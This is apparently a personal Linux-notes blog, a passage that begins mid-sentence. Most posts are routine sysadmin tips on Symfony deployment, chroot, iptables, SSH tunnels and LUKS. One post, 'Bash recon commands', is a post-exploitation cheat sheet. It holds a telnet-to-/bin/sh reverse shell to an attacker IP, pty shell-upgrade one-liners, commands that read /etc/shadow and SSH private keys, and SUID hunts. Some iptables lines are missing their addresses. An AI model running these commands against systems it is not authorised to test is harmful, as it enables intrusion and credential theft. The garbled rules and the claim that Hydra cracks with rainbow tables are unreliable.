defaults to poweroff. HandleSuspendKey= and HandleLidSwitch=
default to suspend. HandleHibernateKey= defaults to hibernate.

Auteur : Harlok

2019-05-13 16:47:48

How to Deploy a Symfony Website to Prod


create the symfony folder with all the Website (generally in /var/www)

First, change ownership to a non-admin/sudo user:
# sudo chown -R user:user /var/www/symfony
Allow the user www-data access to the files inside the application folder. Give this user a read + execute permission (rX) in the whole directory.
# sudo setfacl -R -m u:www-data:rX symfony
Give read + write + execute permissions (rwX) to the user www-data in order to enable the web server to write only in these directories.
# sudo setfacl -R -m u:www-data:rwX symfony/var/cache symfony/var/logs
Finally, we will define that all new files created inside the var/cache and var/logs folders follow the same permission scheme we just defined, with read, write, and execute permissions for the web server user. This is done by repeating the setfacl command we just ran, but this time adding the -d option.

# sudo setfacl -dR -m u:www-data:rwX symfony/var/cache symfony/var/logs

# export SYMFONY_ENV=prod
# composer install --no-dev --optimize-autoloader
# php bin/console doctrine:schema:validate
# php bin/console doctrine:schema:create
# php bin/console cache:clear --env=prod --no-debug

Bonus : create a swap file for a VPS
# dd if=/dev/zero of=/var/swap.img bs=1024k count=1000
# mkswap /var/swap.img
# swapon /var/swap.img
# echo "/var/swap.img none swap sw 0 0" >> /etc/fstab

Auteur : Harlok

2019-04-16 22:17:58

How to Chroot

prepare the folder :
mount /device/to/chroot /chroot/point
If necessary :
mount /device/of/boot /chroot/point/boot
export PATH="$PATH:/usr/sbin:/sbin:/bin"
cd /location/of/new/root
# mount -t proc proc proc/
# mount --rbind /sys sys/
# mount --rbind /dev dev/
And optionally:
# mount --rbind /run run/
Next, in order to use an internet connection in the chroot environment copy over the DNS details:
# cp /etc/resolv.conf etc/resolv.conf
Finally, to change root into /location/of/new/root using a bash shell:

As a User
# chroot /chroot /bin/su - user
# chroot --userspec=user:user --groups=group1 /chroot /bin/bash
As Root
# chroot /location/of/new/root /bin/bash
export PATH="$PATH:/usr/sbin:/sbin:/bin"

To run graphical applications from inside the chroot, first allow local connections to the X server:
# xhost +local:

# echo $DISPLAY
as the user that owns the X server to see the value of DISPLAY. If the value is ":0" (for example), then in the chroot environment run

# export DISPLAY=:0

Auteur : Harlok

2019-04-26 09:57:44

Strong Password Policy

What is a weak password?
This is what makes a password weak:
-> Upper case at the beginning
-> Short
-> Number at the end
-> Tools like Hydra or hashcat can crack it in a second with a rainbow table

Good passwords are random characters
advantages :
-> Hard to crack online
-> Long
-> No upper case at the beginning
-> No number at the end
-> Require a lot of computing power to crack
-> Must be brute-forced; dictionary attacks won't work

That's good but not perfect:
-> Hard to remember
-> Hard to type
-> Not really future proof

Perfect passwords are :
Why :
-> Long
-> No upper case at the beginning
-> Special chars
-> No number at the end
-> Easy to type
-> Easy to remember
-> Plus, if you can write in another language than English, it's harder to crack
-> Future proof
-> Hard to crack offline and online

!! Remember Activate 2FA when it's possible !!
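A toy sketch of generating a long, easy-to-remember password from random words (the word list here is deliberately tiny and hypothetical; a real list such as the EFF diceware list has thousands of entries):

```shell
# Pick 4 random words from a (toy) word list and join them with dashes
words=(cheval pile agrafe correct lampe maison soleil nuage)
passphrase=""
for _ in 1 2 3 4; do
  passphrase="$passphrase${words[RANDOM % ${#words[@]}]}-"
done
passphrase="${passphrase%-}"     # drop the trailing dash
echo "$passphrase"
```

The strength comes from the size of the word list and the number of words, not from symbol substitutions.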

Auteur : Harlok

2019-04-16 21:52:32

SSH Dynamic Tunnel | cli | Linux

## Dynamic Tunnel ##
ssh -D 25000 -f -C -q -N

-D: Tells SSH that we want a SOCKS tunnel on the specified port number (you can choose a number between 1025-65535)
-f: Forks the process to the background
-C: Compresses the data before sending it
-q: Uses quiet mode
-N: Tells SSH that no command will be sent once the tunnel is up
-L: Local port forwarding (listen on the local machine)
-R: Remote port forwarding (listen on the server)
-p: Port of the remote machine

Auteur : Harlok

2019-04-26 09:30:52

Iptables examples | cli | Linux

### Flush, append a few rules, then drop & save ###
iptables -F
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -I INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P INPUT DROP

iptables-save | sudo tee /etc/iptables

/sbin/iptables -A OUTPUT -p tcp --dport {PORT-NUMBER-HERE} -j DROP

### interface section use eth1 ###
/sbin/iptables -A OUTPUT -o eth1 -p tcp --dport {PORT-NUMBER-HERE} -j DROP

### only drop port for given IP or Subnet ##

/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP-ADDRESS-HERE} -j DROP
/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP/SUBNET-HERE} -j DROP
/sbin/iptables -A OUTPUT -p tcp -d --dport 1234 -j DROP
/sbin/service iptables save

# Logging #
### If you would like to log dropped packets to syslog, first log it ###
/sbin/iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix "PORT 80 DROP: " --log-level 7

### now drop it ###
/sbin/iptables -A INPUT -p tcp --destination-port 80 -j DROP

/sbin/iptables -A INPUT -s -i eth1 -p udp -m state --state NEW -m udp --dport 161 -j DROP

# drop students subnet to port 80
/sbin/iptables -A INPUT -s -i eth1 -p tcp -m state --state NEW -m tcp --dport 80 -j DROP

Auteur : Harlok

2019-04-26 09:28:32

Bash recon commands

cat /proc/1/status | grep Name
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
lpstat -a # printers
ps aux
ps -ef
cat /etc/services
ps aux | grep root
ps -ef | grep root
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
arp -e
/sbin/route -nee

tcpdump tcp dst 80 and tcp dst 21
tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Output (Results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445 # On the target system. Use the attacker's IP!

cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
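Building on the /etc/passwd parsing above, a quick sketch narrowing the list to accounts with a real login shell:

```shell
# List username and shell for accounts whose shell is not nologin/false
grep -Ev '(nologin|false)$' /etc/passwd | cut -d: -f1,7
```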

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

ls -ahlR /root/
ls -ahlR /home/

cat /var/apache2/
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

cat ~/.ssh/authorized_keys
cat ~/.ssh/
cat ~/.ssh/identity
cat ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_key

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other

find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.log, mail.warn, messages, syslog, udev, wtmp

python -c 'import pty;pty.spawn("/bin/bash")' # spawn a proper pseudo-terminal from a limited shell
echo os.system('/bin/bash') # from inside an interactive interpreter that exposes os
/bin/sh -i # fall back to a plain interactive shell
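The pty.spawn trick above is only needed when the current shell has no controlling terminal; this quick check (a sketch) prints which case you are in, and the comments recall the usual full upgrade sequence:

```shell
# Does the current shell have a real TTY attached?
if tty -s; then echo "tty: $(tty)"; else echo "not a tty"; fi
# Typical full upgrade from a dumb reverse shell:
#   python -c 'import pty;pty.spawn("/bin/bash")'
#   (Ctrl-Z) then, on your local box: stty raw -echo; fg
#   export TERM=xterm
```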

df -h

cat /etc/fstab

find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (parentheses needed, otherwise -type f only applies to the SUID half)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
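The `-perm -4000` test can be verified without root, since an owner may set the SUID bit on their own files (file names below are made up for the demo):

```shell
tmp=$(mktemp -d)
touch "$tmp/suid_demo" "$tmp/plain"
chmod 4755 "$tmp/suid_demo"  # set the SUID bit
chmod 0755 "$tmp/plain"
find "$tmp" -perm -4000 -type f  # -> only suid_demo is listed
rm -rf "$tmp"
```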

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o=w -type d 2>/dev/null # world-writeable folders

find / -perm -o=x -type d 2>/dev/null # world-executable folders

find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # world-writeable & executable folders

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable folders without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print # files with no owner or no group
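The world-writable tests above can also be checked on a scratch directory (directory names invented for the demo):

```shell
tmp=$(mktemp -d)
mkdir "$tmp/open" "$tmp/closed"
chmod 777 "$tmp/open"    # world-writable
chmod 755 "$tmp/closed"  # not world-writable
find "$tmp" -perm -o=w -type d  # -> only the 777 directory
rm -rf "$tmp"
```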

find / -name "perl*"
find / -name "python*"
find / -name "gcc*"
find / -name cc

find / -name wget
find / -name "nc*"
find / -name "netcat*"
find / -name "tftp*"
find / -name ftp

find . -user user -group group
find . -size 1000c # c = bytes, b = 512-byte blocks, w = 2-byte words, k = KiB, M = MiB, G = GiB
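`-size 1000c` matches files of exactly 1000 bytes; a quick demo on throwaway files (names made up):

```shell
tmp=$(mktemp -d)
dd if=/dev/zero of="$tmp/exactly_1000" bs=1000 count=1 2>/dev/null
dd if=/dev/zero of="$tmp/not_1000" bs=999 count=1 2>/dev/null
find "$tmp" -size 1000c -type f  # -> only exactly_1000
rm -rf "$tmp"
```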

Auteur : Harlok

2020-03-11 20:51:45

Luks | cli | Linux

Set a UUID for the LUKS partition:
cryptsetup luksUUID --uuid "" /dev/sdxX
Open a LUKS device:
cryptsetup luksOpen /dev/sdxX My_Crypt
dmsetup info
Create quickly a key:
dd if=/dev/urandom of=$HOME/keyfile bs=32 count=1
chmod 600 $HOME/keyfile
Add a key to the device:
cryptsetup luksAddKey /dev/sdxX ~/keyfile
Remove a key from the device:
cryptsetup luksRemoveKey /dev/sdxX
Close the volume group:
lvchange -a n My_vg_crypt
Close the LUKS device (pass the mapper name, e.g. My_Crypt or luks-bxxaccxx-xxxd-4f3a-xxxx-16965ea084d1):
cryptsetup -v luksClose My_Crypt
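The keyfile steps above fit together as follows (a sketch; `/dev/sdxX` and `My_Crypt` are placeholders as in the commands above, and the cryptsetup calls are left commented because they require root and a real LUKS device):

```shell
# Generate a 32-byte random keyfile and lock its permissions down
dd if=/dev/urandom of=$HOME/keyfile bs=32 count=1 2>/dev/null
chmod 600 $HOME/keyfile
stat -c '%s %a' $HOME/keyfile  # -> 32 600
# Then, as root, enrol it and open the device with it:
# cryptsetup luksAddKey /dev/sdxX $HOME/keyfile
# cryptsetup luksOpen --key-file $HOME/keyfile /dev/sdxX My_Crypt
```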

Auteur : Harlok

2019-04-26 09:57:40

The Best Linux Distributions for Workstations

Why you should stick with one of these:
- to install it quickly
- to get frequent system and package updates
- for a stable environment
- to get used to the most widely used ones ;-)

Some say you could work with other distributions.
It's up to you.

1) Fedora
Based on Red Hat, it is very stable, well documented and easy to install. It ships SELinux, which is very good for security.

2) openSUSE
A distribution oriented toward developers and sysadmins, but still easy to use and easy to install. SELinux too.

3) Ubuntu
Aimed at beginners and at people who need a lot of graphical apps. Stable too and easy to install.

4) Arch Linux
Why Arch for workstations?
Well, it's not for beginners.
Once you know what you are doing, no problem: a great distribution, very well documented.
For workstations you should go for the linux-lts kernel.
Use LVM and make snapshots.

Debian is stable, but some package updates are slow to come. It's a great distribution nonetheless, especially for servers.

Auteur : Harlok

2019-05-04 21:54:13

Hi, and welcome to my blog!

Hi all and welcome! Please feel free to post any comment, but be respectful!
The purpose of this blog is to remind me of the commands and great articles I use for Linux and dev work.
If an article belongs to you, please let me know and I will add your name and a link to your website.
Have a nice day!

Auteur : Harlok

2019-04-26 16:10:59